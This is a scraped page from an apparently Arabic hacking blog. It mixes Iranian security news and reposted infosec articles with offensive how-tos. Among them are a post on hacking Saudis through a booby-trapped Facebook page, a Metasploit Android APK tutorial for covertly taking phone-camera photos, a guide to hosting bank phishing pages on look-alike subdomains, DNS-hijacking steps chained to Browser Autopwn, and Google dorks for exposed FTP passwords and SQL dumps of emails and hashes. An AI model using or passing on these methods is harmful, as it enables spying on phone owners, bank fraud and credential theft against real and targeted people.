الأمن الإيراني: إعتقال أكثر من 130 تكفيرياً وإبطال محاولتي تفجير - R00TNETWORK.ORG

  #العراق #سوريا #لبنان #السعودية #ايران #امريكا #تركيا #روسيا #الاردن #الكويت #سوريا #اليمن #الجزائر #تونس #مصر #قطر #الامارات#فضائح #صحف #اخبار #مخابرات #جرائم #فضائح #جهاد_نكاح #الصين #اوربا #المهجر #العالم
#قطر #الامارات#فضائح #صحف #اخبار #مخابرات #كاركاتير #ال_سعود

R00TNETWORK.ORG NEWS.R00TNETWORK.ORG AR.R00TNETWORK.ORG

وزير الأمن الإيراني محمود علوي

كشف وزير الأمن الإيراني أنه تم ضبط وإبطال مفعول حزامين ناسفين كانا معدين للتفجير في مركزي محافظتين في البلاد خلال مسيرات يوم القدس العالمي (آخر جمعة من شهر رمضان)، معلناً عن اعتقال 130 عنصراً من العناصر التكفيرية المؤثرة.

جاء ذلك في تصريح لوزير الأمن الإيراني محمود علوي في الرد على أسئلة النواب خلال اجتماع مجلس الشورى الإسلامي اليوم الثلاثاء.
وقال علوي في تصريحه إن وزارة الأمن تدرك بعمق الحساسيات تجاه القضايا الأمنية والتهديدات، وتقوم بناء على توجيهات قائد الثورة الإسلامية بالرد بما يستلزم على التهديدات الأمنية.
وأضاف أن وزارة الأمن تعمل على الدوام سواء على المستوى الاستراتيجي أو العملاني أو التكتيكي برؤية واقعية ومستقبلية، على رصد القضايا الأمنية وإرساء الأمن بأفضل صورة ممكنة في البلاد بالتعاون مع سائر الأجهزة الأمنية.
وفي الإشارة إلى إنجازات وزارة الأمن في مواجهة التهديدات قال إنه تم الكشف عن حزامين ناسفين معدين للتفجير في مركزي محافظتين في البلاد خلال مسيرات يوم القدس العالمي (آخر جمعة من شهر رمضان المبارك).
وتابع علوي أن الإجراءات العملانية والاشتباكات مع العدو تعد من سائر أنشطة وزارة الأمن: وما يمكن الإشارة إليه في هذا الصدد هو اعتقال عناصر معادية للثورة وشريرة ومن ضمنه كشف واعتقال خلايا مرتبطة بالتكفيريين خلال العشرات من العمليات واعتقال أكثر من 130 من عناصرهم المؤثرة وكذلك توجيه ضربات حاسمة لمواقع وقوات الزمر الشريرة والقضاء على العديد من الزمر في شرق وغرب البلاد ومنها زمرة "فرقان" وكشف وإبطال مفعول شحنات تفجيرية ضخمة لهذه الزمر؛ وكذلك إطلاق سراح ثلاثة رهائن.
وصرح بأن من الإجراءات الأخرى لوزارة الأمن القضاء على قادة وعناصر مؤثرة في شرق وغرب البلاد ومن ضمنه القضاء على العنصر المسؤول عن جريمة يوم التاسع من شهر محرم في جابهار وتفكيك الزمرة التابعة له.
وأوضح بأن من الإجراءات الأخرى لوزارة الأمن؛ ضبط أسلحة ومعدات من ضمنها أحزمة ناسفة وأجهزة اتصالات تابعة للعناصر الشريرة.
وأشار علوي إلى أنشطة أخرى لوزارة الأمن قائلاً، إن لوزارة الأمن وفي مسار تنفيذ مهامها الذاتية، عقدت الكثير من الجلسات مع مختلف التيارات السياسية وغير السياسية، ولقد كانت لنا جلسات حتى مع شورى الحزب الديمقراطي المنحل وشورى حزب كومولة، وأضاف أن: من  الطبيعي للأجهزة الأمنية أن تعقد جلسات مع التيارات المناهضة والمحاربة (لنظام الجمهورية الإسلامية في إيران) وخفض أضرارها إلى الحد الأدنى.

تصنيف :

• اهم الاخبار
• العالم الاسلامي
• ایران
• سياسة

كلمات دليلية :

• وزير الأمن الإيراني
• العناصر التكفيرية
• محمود علوي

Follow @KAMINDOZ Tweet

نصائح مهمة في التلغيم

طريقة جميلة لأختراق السعودين من خلال تصميم صفحة فيس بوك تخص عصابات الثورة السورية ههههههههه وتقوم بنشر الصفحه وتلغيم المعجبين والمتابعين لصفحتك

وانته وشطارتك طبعا شباب راح انشر الطرق الخاصة بيه يوميا

تكملة الموضوع

http://ar.r00tnetwork.org/kamindoz794

Follow @KAMINDOZ Tweet

مقال : إختراق أجهزة Android والتحكم بالكاميرات الخاصه بها

تكلمنا في فيديو سابق عن كيفية إختراق أنظمة Android والتحكم بها من خلال تكون ملف APK من خلال مشروع Metasploit ومن ثم الحصول على صلاحيات للتحكم بالجهاز بشكل بسيط , في هذا المقال سوف أشرح كيفية إختراق أنظمة Android من خلال Meterpreter APK payload يتم تكوينه من خلال Metasploit ومن ثم إلتقاط بعض الصور من خلال الكاميرا الامامية والخلفية لجهاز يعمل بإستخدام نظام Android.
سوف نبدأ بتكون Meterpreter android payload من خلال Metasploit , شاهدوا الصورة التالية :

كما نلاحظ قمنا بتكوين Android Meterpreter payload , يقوم بعمل إتصال عكسي على عنوان ip خاص بجهازي وعلى المنفذ 1234 , يرجى مراجعة دورة إختبار الإختراق مع Metasploit المجانية لكي تستطيع فهم هذا المقال بشكل أفضل , الأن دعونا نقوم بتجهيز إستلام الإتصال من خلال Metasploit من خلال Multi handler :

رائع  ! , قمنا بالتنصت على المنفذ 1234 من خلال Multi handler  ,الأن نستطيع إستقبال الإتصال القادم من خلال البايلود الخاص بنا , الأن سوف يكون هنالك العديد من السيناريوهات التي سوف نعمل عليها لإيصال ملف pay.apk الذي تم توليده مسبقاً إلى جهاز Android الذي سوف يتم إختراقه , سوف أطرح مجموعة من السيناريوهات وهي :

• عمل Dns Spoof وتحويل المستخدم لصفحه تمت برمجتها مسبقاً لإقناعه بتحميل ملف pay.apk.
• إرسال ملف pay.apk بشكل مباشر للمستخدم .
• تزوير بعض الأمور داخل Google play وتحميل pay.apk من خلاله.

أعلم أن السيناريو الأخير قد يكون ممتع جداً وقوي جداً ولكنني سوف أختار السيناريو الثاني في البدايه لتوضيح ألية العمل وسوف أترك سيناريو Google play لشرح قوي وجديد من نوعة في هذا المجال , واما بالنسبه للسيناريو الأول سوف أتطرق له لاحقاً أيضاً
سوف نقوم الان بإرسال ملف pay.apk إلى المستخدم من خلال Bluetooth  , وهذه الصور من نظام Android توضح كيفية إستقبال وتشغيل الملف :






حسناً , كما نلاحظ قمنا بتنصيب pay.apk على جهاز Android وسوف نقوم بتشغيله الأن وإكمال العملية الخاصه بنا , هذه الصور توضح إكتمال تنصيب pay.apk


كما نلاحظ تم تنصيب pay.apk وهو يعمل الان تحت إسم Main activity سوف نقوم بتشغيله الأن وسوف نلاحظ عمل إتصال عكسي معنا , وهذه الصور توضح ذلك :

جميل جداً , لنحاول الان تنفيذ الأمر help لمشاهدة بعض الأوامر المتاحه وسوف نلاحظ بأخر سطر الأوامر وجود الصورة التالية :



كما نشاهد يوجد الخيار webcam_list و webcam_snap , سوف نقوم الأن بجلب الكاميرات الموجوده داخل الجهاز من خلال تنفيذنا للأمر webcam_list :


جيد ! كما نلاحظ يوجد كاميرتان داخل الجهاز لنقام الأن بتنفيذ الأمر webcam_snap ومن ثم تحديد رقم الكاميرا التي نريد إلتقاط الصوره منها وسوف يكون هذا ناتج تنفيذ الأمر :



وهذه هي الصورة التي تم إلتقاطها من خلال الكاميرا الأمامية الخاصه بجهازي :



كما نرى , تمكنا من إلتقاط صورة من الكاميرا الخاصة بجهازي بعد إختراق نظام من خلال APK metepreter وبإذن الله سوف يكون هنالك المزيد من الشروحات القوية التي تختص في إختبار إختراق الهواتف الذكية.

التصنيف : أمن وحماية الهواتف الذكية, مواضيع عامة, مواضيع ومقالات

Follow @KAMINDOZ Tweet

كيفية تنزيل السكام على Cpanel وتثبيتها !!

السلام عليكم ورحمة الله وبركاته

1- كيفية رفع السكامة على Cpanel وتثبيتها .

2- كيفية إنشاء Subdomain يشبه موقع البنك المراد تزويرها

---

تم رفع الدرس على الميديا فير محبووب الملايين

للتحميل من هنا


 

المرحلة الاولى : كيفية رفع السكامة على Cpanel وتثبيتها .

---

المرحلة الثانية : كيفية إنشاء Subdomain يشبه موقع البنك المراد تزويرها .

---

الباسوورد:www.team-snipers.com
منقول للفائده 

Follow @KAMINDOZ Tweet

انطلاق موقع امان الشيعه sec.r00tnetwork.org

بسم الله الرحمن الرحيم 

السلام عليكم 

تم بحمد الله انطلاق موقع امان الشيعه

http://sec.r00tnetwork.org

يمكنكم المشاركه به واضافة المواضيع الجميله 

الموقع متاح للجميع

Follow @KAMINDOZ Tweet

تنصيب mod_security on Apache centos

 

 

 

Installing ModSecurity

Before you install ModSecurity, you'll want to have a LAMP stack set up on your Linode. For instructions, see the LAMP Guides.

Ubuntu / Debian

To install ModSecurity on a Linode running Ubuntu or Debian, enter the following commands, one by one:

sudo apt-get install libxml2 libxml2-dev libxml2-utils
sudo apt-get install libaprutil1 libaprutil1-dev
sudo apt-get install libapache-mod-security

ModSecurity is now installed on your Linode.

CentOS / Fedora

To install ModSecurity on a Linode running CentOS or Fedora, perform the following steps:

1. Install the GCC compiler and the dependancies by entering the following commands, one by one:

   sudo yum install gcc make
   sudo yum install libxml2 libxml2-devel httpd-devel pcre-devel curl-devel
   

2. You'll need to install mod_security from source as there is no maintained package CentOS or Fedora yet. Grab the mod_security package and install it by entering the following commands, one by one:

   cd /usr/src
   wget http://www.modsecurity.org/download/modsecurity-apache_2.6.2.tar.gz
   tar xzf modsecurity-apache_2.6.2.tar.gz
   cd modsecurity-apache_2.6.2
   ./configure
   make install
   cp modsecurity.conf-recommended /etc/httpd/conf.d/modsecurity.conf
   

3. Now you'll need to modify your Apache configuration to load the ModSecurity module. Find the LoadModule section in httpd.conf and add this line to the end:

   File:/etc/httpd/conf/httpd.conf

   LoadModule security2_module modules/mod_security2.so
   

4. Restart Apache by entering the following command:

   sudo /etc/init.d/httpd restart
   

ModSecurity is now installed on your Linode.

OWASP ModSecurity Core Rule Set

For a base configuration, we are going to use the OWASP core rule set. This section explains how to download the latest tarball and move it into place on your Linode.

Ubuntu / Debian

To grab the latest tarball on a Linode running Ubuntu or Debian, enter the following commands, one by one:

cd /etc/apache2
wget http://downloads.sourceforge.net/project/mod-security/modsecurity-crs/0-CURRENT/modsecurity-crs_2.2.5.tar.gz
tar xzf modsecurity-crs_2.2.5.tar.gz
mv modsecurity-crs_2.2.5 modsecurity-crs
cd modsecurity-crs

The OWASP core rule set is now in place on your Linode.

CentOS / Fedora

To grab the latest tarball on a Linode running CentOS or Fedora, enter the following commands, one by one:

cd /etc/httpd/conf
wget http://downloads.sourceforge.net/project/mod-security/modsecurity-crs/0-CURRENT/modsecurity-crs_2.2.5.tar.gz
tar xzf modsecurity-crs_2.2.5.tar.gz
mv modsecurity-crs_2.2.5 modsecurity-crs
cd modsecurity-crs

The OWASP core rule set is now in place on your Linode.

Configuring ModSecurity

You'll want to use the modsecurity_10_crs_config, so let's copy that from the example:

cp modsecurity_crs_10_config.conf.example modsecurity_crs_10_config.conf

There are five rules directories:

• activated_rules
• base_rules
• experimental_rules
• optional_rules
• slr_rules

Note

The activated_rules directory will be empty in case you wanted to symlink the configuration files for the rules you wish to use into that directory.

There are two ways to configure ModSecurity: use a basic ruleset, or use symbolic links. The following sections explain how to use both methods.

Using a Basic Ruleset

If you want to get started with a basic ruleset and would rather not bother with symbolically linking configuration files, perform the following steps:

1. Modify your httpd.conf file as shown below:

   File:/etc/apache2/httpd.conf (Debian / Ubuntu)

   
       Include modsecurity-crs/*.conf
       Include modsecurity-crs/base_rules/*.conf
   
   

   File:/etc/httpd/conf/httpd.conf (CentOS / Fedora)

   
       Include modsecurity-crs/*.conf
       Include modsecurity-crs/base_rules/*.conf
   
   

2. In the modsecurity_crs_20_protocol_violations.conf file, rename the REQBODY_ERROR variable to REQBODY_PROCESSOR_ERROR.
3. Restart Apache for the updates to take effect:

   Debian / Ubuntu:
   

   /etc/init.d/apache2 restart
   

   CentOS / Fedora:
   

   /etc/init.d/httpd restart
   

You have successfully configured ModSecurity.

Using Symbolic Links

If you would rather symbolically link those configuration files to the activated_rules directory, perform the following steps:

1. Edit the Apache configuration file so IfModule looks like this:

   File:/etc/apache2/httpd.conf (Debian / Ubuntu)

   
       Include modsecurity-crs/modsecurity_crs_10_config.conf
       Include modsecurity-crs/activated_rules/*.conf
   
   

   File:/etc/httpd/conf/httpd.conf (CentOS / Fedora)

   
       Include modsecurity-crs/modsecurity_crs_10_config.conf
       Include modsecurity-crs/activated_rules/*.conf
   
   

2. Create the symbolic links before restarting Apache. A few examples are shown below.

   • To copy all the base_rules over to activated_rules:

     for f in `ls base_rules/` ; do ln -s /usr/local/apache/conf/crs/base_rules/$f activated_rules/$f ; done
     

   • To copy the comment spam rules from the optional_rules directory to the activated_rules directory:

     for f in `ls optional_rules/ | grep comment_spam` ; do sudo ln -s /usr/local/apache/conf/crs/optional_rules/$f activated_rules/$f ; done
     

3. Restart Apache for the updates to take effect:

   Debian / Ubuntu:
   

   /etc/init.d/apache2 restart
   

   CentOS / Fedora:
   

   /etc/init.d/httpd restart
   

You have successfully configured ModSecurity.

Follow @KAMINDOZ Tweet

شرح تغيير بورت الشيل SSH Port و إنشاء قاعدة بيانات وربط مستخدم بها باستخدام الأوامر

احياناً يحتاج البعض لإنشاء قاعدة بيانات، وربط مستخدم بها، في حين غياب بعض البرمجيات الجاهزة مثل الـ WHM والـ cPanel.

هذا شرح سريع وبسيط للقيام بهذه المهمة باستخدام الـ Shell، وبدون الحاجة لأي لوحة تحكم.

1- قم بتنفيذ الأمر
رمز Code:

mysql -u root -p

وادخل كلمة المرور للمستخدم root

2- قم بتنفيذ الأمر ( إنشاء القاعدة )
رمز Code:

create database DBNAME;

مع استبدال DBNAME بإسم قاعدة البيانات

3- قم تنفيذ الأمر ( إنشاء مستخدم جديد )
رمز Code:

grant usage on *.* to DBUSER@localhost identified by 'DBPASS';

مع استبدال DBUSER و DBPASS باسم المستخدم وكلمة المرور

4- إعطاء التصريحات للمستخدم:
رمز Code:

grant all privileges on DBNAME.* to DBUSER@localhost ;

الآن انتهينا بفضل الله !

للتجربة يمكنك الخروج من الـ mysql وإعادة الإتصال مباشرة على القاعدة بالمستخدم، كالتالي:
رمز Code:

 mysql -u DBUSER -p'DBPASS' DBNAME

Follow @KAMINDOZ Tweet

US Prosecutor drops Criminal charges against Barrett Brown

U.S. Prosecutors decided not to pursue crucial criminal charges against journalist and activist Barrett Brown, and dismiss a majority of charges related to sharing a link to a dump of credit card numbers connected to the breach of intelligence firm Stratfor.

Supporters say Brown just copied the hyperlink from an the Internet chat room and then reposted the link on his own internet chat room, Project PM, that linked to stolen documents from the US government contractor, Stratfor Global Intelligence, included 860,000 e-mail addresses for Stratfor subscribers and 60,000 credit card details.

Just hours after Brown's lawyers filed their comprehensive argument, the DOJ has filed a motion to dismiss all 11 charges, on Thursday. 

Apart from computer fraud charges, Brown is also facing prosecution for allegedly threatening an FBI agent and for alleged obstruction of justice.

The Electronic Frontier Foundation (EFF), a non-profit organization defending civil liberties in the digital world, released a statement on the decision: “We are relieved that federal prosecutors have decided to drop these charges against Barrett Brown. In prosecuting Brown, the government sought to criminalize a routine practice of journalism—linking to external sources—which is a textbook violation of free speech protected by the First Amendment.”

Brown is a well known figure in hacking and internet freedom circles, having had his writings published in outlets such as Vanity Fair and the Guardian. In September 2012, he was arrested by Law enforcement officers in a dramatic raid of his apartment, while he was having a live online video chat session with a few others.
Until his arrest, he ran a collaborative web publication very well known as Project PM that engaged in issues relating to official leaks and the work of the hacking collective Anonymous.

Kevin Gallagher, the director of the Free Barrett Brown support network, who think that the prosecution’s decision “unexpected and amazing,” said in a statement:

“The charges against Barrett Brown for linking were flawed from the beginning. In the face of a rigorous legal challenge mounted by his defense, the government has finally recognized it and signaled that this is a battle they don’t want to fight.”

Brown, currently being held in Texas, has spent more than a year behind bars and still faces up to 70 years in prison. Brown has two trials scheduled for April 28 and May 19, respectively, where he will be seen answering 17 charges related to his work on uncovering online surveillance.

Now, this is not the first time when the US government has forced strict laws against the hacktivists, last year, a 26-year-old, Reddit cofounder and the digital Activist, Aaron H. Swartz committed suicide, who was accused of hacking the MIT JSTOR database and charged $4 million in fines and up to 50 years in prison by the Court.

Follow @KAMINDOZ Tweet

Tor Network used to Host 900 Botnets and hidden Darknet Markets

Tor network offers users browse the Internet anonymously and is mostly used by activists, journalists to conceal their online activities from prying eyes. But it also has the Dark side, as Tor is also a Deep Web friendly tool that allows hackers and cyber criminals to carry out illicit activities by making themselves anonymous.

Kaspersky security researcher reported that Tor network is currently being used to hide 900 botnet and other illegal hidden services, through its 5,500 plus nodes i.e. Server relays and 1,000 exit nodes i.e. Servers from which traffic emerges.

These days, Cyber criminals are hosting malware’s Command-and-control server on an anonymous Tor network to evade detection i.e., difficult to identify or eliminate. Illegal use of the Tor network boosted up after the launch of the most popular underground Drug Market - Silk road that also offered arms and malware to their users against Bitcoin,one of the popular crypto currency.

ChewBacca, a point-of-sale keylogger was found to be used by them and the new Zeus banking malware variant with Tor capabilities, also the researcher has found the first Tor Trojan for Android as well.

With the use of ‘Darknet resources’, such as Tor network, cybercriminals are offered various advantages and the possibility of creating an abuse-free underground forum, market and malware C&C server is attracting more and more cyber criminals, who are increasingly moving towards the technology, according to Kaspersky Lab.

“Hosting C&C servers in Tor makes them harder to identify, blacklist or eliminate," explained Sergey Lozhkin, a senior security researcher at Kaspersky Lab, “Although, creating a Tor communication module within a malware sample means extra work for the malware developers. We expect there will be a rise in new Tor-based malware, as well as Tor support for existing malware,” he added.

Tor network resources, including command-and-control servers, admin panels and other malware-related resources, ‘Carding’ shops are also waving on the Darknet. “Offers are not limited to credit cards – dumps, skimmers and carding equipment are for sale too,” said the researcher.

As you know, by browsing the web using Tor hides the users’ IP address, allows journalist, Internet activist to cyber criminals to maintain anonymity. In addition, this Darknet resource is resulting in financial fraud and money laundering.

Follow @KAMINDOZ Tweet

PREC Tool prevents Android Device from Root Exploit hidden in Malicious apps

Smartphones are always ready to connect to the Internet and contains sensitive information such as Contacts, SMS, Photos, and GPS information and this sensitive information is always in danger of leakage.

According to a report, Cyber criminals and state-sponsored hackers are developing 55,000 new malware variants, each and every day; and many of them try to elevate privileges for unfettered control of the user device.

North Carolina State University Researchers have developed a new software, called Practical Root Exploit Containment (PREC), with the sole purpose of detecting mobile malware that attempts to run Root exploits in Android devices. Root exploits take control of system administration functions of the operating system that gives the hacker an unrestricted control of user’s Smartphone.

That means, an application has not permission to read your messages or contacts or the GPS location, but after getting root access it will be able to steal any data from your device.

Anomaly Detection is one of the existing detection technique that compares the behavior of a downloaded Smartphone application, such as Google Chrome, with a database of how the application should be expected to behave. "When deviations from normal behavior are detected, PREC analyses them to determine if they are malware or harmless 'false positives.' "

PREC tool used the refined techniques of Anomaly Detection to prevent it from giving false positives, "Anomaly detection isn't new, and it has a problematic history of reporting a lot of false positives," said Dr Will Enck, co-author of the research paper.

PREC targets the code written in C language which is usually used by hackers to create malware and can identify calls made to native C code from a Java program.

The researchers tested a prototype of the tool on the Google Galaxy Nexus device against 150 Android apps, of which 10 contained root exploits. “We can achieve 100 percent detection rate and raised false alarms in one out of 140 popular apps tested,” he said.

Malware writers have developed techniques that hide malware until the application is installed on the Smartphone but thanks to Google, most apps in the Android Play store are pretty clean, but the best protection is common sense; Ensure you only Install Apps from Trusted Sources.

Follow @KAMINDOZ Tweet

Facebook 'Watch naked video of friends' malware scam infects 2 million people

We have seen a lot of Facebook malware and virus infections spreading through friends list, and this time a new clickjacking scam campaign is going viral on Facebook.

Hackers spam Facebook timeline with a friend's picture and "See (Friend)'s naked video," or "(Friend Name's) Private Video."

The Picture appears to be uploaded by a friend and definitely, you might want to see some of your Facebook friends naked, But Beware! If you get curious and click, you will be redirected to a malicious website reports that your Flash Player is not working properly and needs to be re-installed.

But in actuality it will install a malware in your system and once approved, several disguised thing can happen to you. It further installs a malicious browser extension to spread the scam and steal users’ photos.

"When the link is clicked, users are sent to a very realistic-looking mockup of a YouTube page, where the hackers will try to immediately install the Malware Trojan." wltx reports.

So, Don't Click it! According to the report, 2 million Facebook users are already infected with the same malware campaign and unknowingly flood their friend's timeline will same campaign. Clicking on the message will automatically publish the same link on the victims Facebook wall potentially allowing friends to click on it.

Malware often takes advantage of the fact that you trust your friends. So, keep an eye on the links and messages from your friends, and if in doubt, ask them they actually sent you something or not.

The recent malware attacks are just a few examples of the dangers of using the social network Facebook. Stay safe by keeping your browser up-to-date and install operating system updates when they are released. Please ensure you share this news with your Facebook friends to make all of them aware of it.

Follow @KAMINDOZ Tweet

Sophisticated Russian Malware 'SNAKE' and 'Turla' targets Governments and Military Networks

Last week, the Researchers at the German security company G Data Software have reported about the most complex and sophisticated rootkit  malware, Uroburos which is designed to steal data from secure facilities and has ability to take control of an infected machine, execute arbitrary commands and hide system activities.

Recently, British cyber specialist BAE has disclosed the parent Russian malware campaign dubbed as ‘SNAKE’ that remained almost undetected for least eight years while penetrating highly secured systems. Uroburos rootkit was one of the components of this campaign.

In a separate Investigation, Western intelligence officers have found another piece of spyware , infecting hundreds of government computers across Europe and the United States, known as 'Turla'. Researchers believed that Turla campaign is linked to a previously known campaign 'Red October', a massive global cyber spying operation targeting diplomatic, military and nuclear research networks.

"It is sophisticated malware that's linked to other Russian exploits, uses encryption and targets western governments. It has Russian paw prints all over it," said Jim Lewis, a former U.S. foreign service officer.

Yesterday, BAE Systems Applied Intelligence unfolds the ‘extent of venomous’ nature of Snake that uses the novel tricks to by-pass Windows security, including its ability to hide in the victim's web traffic, bearing all the hallmarks of a highly sophisticated cyber operation, exploiting vulnerabilities with the intervention of the user and also has ability to exploit a privilege escalation vulnerability which enables it to bypass Windows 64-bit security which is alike to a ‘zero-day' exploit.

"Its design suggests that attackers possess an arsenal of infiltration tools and bears all the hallmarks of a highly sophisticated cyber operation. Most notable is the trick used by the developers to load unsigned malware in 64-bit Windows machines, by-passing a fundamental element of Windows security," said BAE.

The practice was previously known as Agent.BTZ that came to the surface in 2008 when US Department of Defense sources claimed that its classified networks had been breached by an early version of the same virus. It has since been developed with many advanced features that make it even more flexible and sophisticated than before, BAE said.

According to BAE Systems Applied Intelligence, the malware campaign has been seen mostly in Eastern Europe, but also in the US, UK and other Western European countries. The malware can infiltrate Windows XP, Vista, 7 and 8-based systems.

"Although there has been some awareness of the Snake malware for some years, until now the full scale of its capabilities could not be revealed, and the threat it presents is clearly something that needs to be taken much more seriously," said Martin Sutherland, BAE Systems' applied intelligence managing director.

“The threat described in this report really does raise the bar in terms of what potential targets, and the security community in general, have to do to keep ahead of cyber attackers. As the Snake research clearly illustrates, the challenge of keeping confidential information safe will continue for many years to come,” he claimed.

Follow @KAMINDOZ Tweet

Protect Your HTML Source Code – Free HTML Encryption Tools

Are you a Web Designer ?

Going to develop a Unique Layout in HTML/CSS based website ?
Than you must dont want that your unique layout get coped by others and used!
HTML based websites are very easy to copy, anyone can copy your HTML/CSS website in minutes. In his article i will show you that “How to Protect Your HTML Source Code”

Free Online HTML Encryption Tools

1:  Smart Guest HTML Encryption Tool

http://www.smartgb.com/free_encrypthtml.php

2: Web Tool Hub

http://www.webtoolhub.com/tn561359-html-encrypter.aspx

3:  About.com HTML Encryptor

http://javascript.about.com/library/blenc1.htm

4: iWebtool Encryption Tool

http://www.iwebtool.com/html_encrypter

 5: DevGizmo HTML Encrypt

http://devgizmo.com/html-encrypt/

6: Fourmilab Javascript HTML Encryption

http://www.fourmilab.ch/javascrypt/javascrypt.html

Follow @KAMINDOZ Tweet

Linksys Malware 'The Moon' Spreading from Router to Router

Which Wireless Router do you have at your Home or Office? If it’s a Linksys Router you could be in the danger to a new malware that attacks your firmware and replicates itself.

Security researcher Johannes B. Ullrich from the SANS Technology Institute has warned about a self-replicating malware which is exploiting authentication bypass and code-execution vulnerabilities in the Linksys wireless routers.

The Malware named as ‘THE MOON’, scans for other vulnerable devices to spread from router to router and Johannes confirmed that the malicious worm has already infected around 1,000 Linksys E1000, E1200, and E2400 routers.

In order to hack the Router, malware remotely calls the Home Network Administration Protocol (HNAP), allows identification, configuration and management of networking devices.

The Malware first request the model and firmware version of the router using HNAP and if the device founds vulnerable, it sends a CGI script exploit to get the local command execution access to the device.

Linksys's parent company has confirmed that HNAP1 implementation has a security flaw whose exploit code is publicly available on the Internet.

“There are about 670 different IP ranges that it scans for other routers. They appear to all belong to different cable modem and DSL ISPs. They are distributed somewhat worldwide),”

‘To what extent this worm can be dangerous’ is yet a question.

“We are still working on analysis what it exactly does. But so far, it looks like all it does is spread (which is why we call it a worm). It may have a ‘call-home’ feature that will report back when it infected new hosts.”

To verify that your device is vulnerable or not, use following command (depending on your OS):

echo [-e] “GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n” | nc routerip 8080

If you receive an XML HNAP reply, you are likely to be victimized for the worm affecting Linksys devices and some preventive measures are to be taken. Also keep an eye on the logs of port 80 and 8080.

Users are recommended to Disable Remote Administration of their device or limits the administration right to a limited number of trusted IP addresses.

Follow @KAMINDOZ Tweet

Hackers exploiting Router vulnerabilities to hack Bank accounts through DNS Hijacking

In past months, we have reported about critical vulnerabilities in many wireless Routers including Netgear, Linksys, TP-LINK, Cisco, ASUS, TENDA and more vendors, installed by millions of home users worldwide.

Polish Computer Emergency Response Team (CERT Polska) recently noticed a large scale cyber attack ongoing campaign aimed at Polish e-banking users.

Cyber criminals are using known router vulnerability which allow attackers to change the router's DNS configuration remotely so they can lure users to fake bank websites or can perform Man-in-the-Middle attack.

'After DNS servers settings are changed on a router, all queries from inside the network are forwarded to rogue servers. Obviously the platform of a client device is not an issue, as there is no need for the attackers to install any malicious software at all.' CERT Polska researchers said.

That DNS Hijacking trick is not new, neither most of the router vulnerabilities are, but still millions of routers are not patched or upgraded to the latest firmware version.

The Domain Name System, or DNS, the Internet’s method of converting Web page names into IP address numbers can be hijacked just by changing the server address to a malicious DNS server from router's settings; and that which malicious DNS server should be in control of the hacker to facilitate interception, inspection and modification of the traffic between users and the online banking websites they wanted to target.

"It looks like criminals are primarily targeting e-banking users as they modify DNS responses for several banking domains, while resolving other domain names normally." they said.

Most of the Banking and E-commerce sites are using HTTPS with SSL encryption, making it impossible to impersonate them without a valid digital certificate issued by a Certificate Authority (CA), but to bypass such limitation cyber criminals are also using the SSL strip technique to spoof digital certificates. 

“While criminals intercept the unencrypted request, they simply modify links to clear HTTP, adding “ssl-“ String to a hostname, apparently in an attempt to fool casual users (Note that the nonexistent ssl-. hostnames would only be resolved by malicious DNS servers) While the connection is proxied through malicious servers, SSL is terminated before it reaches the user. Decrypted content is then modified and sent unencrypted to the customer.”

"In cases we have seen, they produced a self-signed certificate for thawte.com domain, which causes a browser to complain about both domain name mismatch and lack of a trusted CA in the certificate chain. This should be a clear indicator of the fraud for most users."

Demonstration of Exploitation:
Penetration tester and Computer Science Student, ABDELLI Nassereddine from Algerian, who reported previously about critical unauthorized access and password disclosure vulnerability in the TP-LINK Routers provided by Algerie Telecom, has also published the practical demonstration on 'How to Hack Victim's computer and accounts by hijacking Router's DNS server'.

To perform this, he used DNS Proxy tool 'Dnschef' and exploitation tools including Metasploit, webmitm and Burp Suite. Steps to follow:

• Install these tools and run following command:

./dnschef.py –interface 192.168.1.106 –fakeip 192.168.1.106 

(where interface is the original IP address and fakeip is the resolution of the DNS query)

• Run 'webmitm tool' that will handle the HTTP requests and responses and also forward the traffic to Burp Suite Proxy to inject an iframe of the Metasploit's Browser AUTOPWN Server.
• Launch the Bowser AUTOPWN module on Metasploit and get access.

Our readers can get detailed explanations of exploitation technique on the Nassereddine's blog.

How to Protect?
Now that you know how hackers can target routers to mess up the internet connection or even steal banking, Facebook, Google passwords, the next best thing to do is to secure your own routers:

• Change the default username and password.
• Update the Router's firmware to latest patched version.
• Users can spot fake sites by pay attention to the browser’s address bar and HTTPS indicators.
• Disable Remote Administration feature, especially from WAN. The router should be configurable only from the local network or LAN.

Follow @KAMINDOZ Tweet

Google Hacking Database – GHDB – Ftp Passworld Google Dork Xss Google Dork Php Google Dork SQL Dork World Press Dork Passworld File Dork Mıcs Dork Free Swag Dork Webcam Dork

• Web
• Images
• News
• Videos

KAMINDOZ SHIA TEAM

GROUP SHIA TEAM BLOG SHIA TEAM SEARCH EXPLOIT

Google Hacking Database – GHDB  - Ftp Passworld Google Dork Xss Google Dork Php Google Dork SQL Dork World Press Dork Passworld File Dork Mıcs Dork Free Swag Dork Webcam Dork

A.) FTP PASSWORD GOOGLE DORKS
B.) XSS GOOGLE DORKS
C.) PHP GOOGLE DORKS
D.) SQL DORKS
E.) WORDPRESS DORKS
F.) PASSWORD FILE DORKS
G.) MISC. DORKS
H.) FREE SWAG DORKS
I.) WEBCAM DORKS
A.) FTP PASSWORD GOOGLE DORKS
1.) ws_ftp.ini configuration file search:
intitle:index.of ws_ftp.ini
2.) ws_ftp.ini configuration file with “Parent Directory” search:
filetype:ini ws_ftp pwd
3.) Variation:
”index of/” “ws_ftp.ini” “parent directory”
4.) Variation:
+htpasswd +WS_FTP.LOG filetype:log
5.) Variation:
(Substitute vulnerablesite.com with your site you want to search)
”allinurl: “Vulnerablesite.com” WS_FTP.LOG filetype:log”
B.) XSS GOOGLE DORKS
1.) cart32 executable file.
allinurl:/scripts/cart32.exe
2.) Cute news php file.
allinurl:/CuteNews/show_archives.php
3.) phpinfo.php file.
allinurl:/phpinfo.php
C.) PHP GOOGLE DORKS
1.) config.php file search:
intitle:index.of config.php
2.) PHP file contents search:
intitle:”Index of” phpinfo.php
3.) download.php directory transversal vulneralbilities:
inurl:download.php?=filename
4.) upload.php search:
intitle:index.of upload.php
inurl:upload.php
D.) SQL PASSWORD DUMP DORKS
1.) SQL dumps saved to database search. (Some of the more common passwords for you):
a.) ”123456″ = hashed password
ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e
b.) ”654321″ = hashed password
ext:sql intext:@gmail.com intext:c33367701511b4f6020ec61ded352059
c.) ”password” = hashed password
ext:sql intext:@gmail.com intext:5f4dcc3b5aa765d61d8327deb882cf99
d.) ”12345678″ = hashed password
ext:sql intext:@gmail.com intext:25d55ad283aa400af464c76d713c07ad
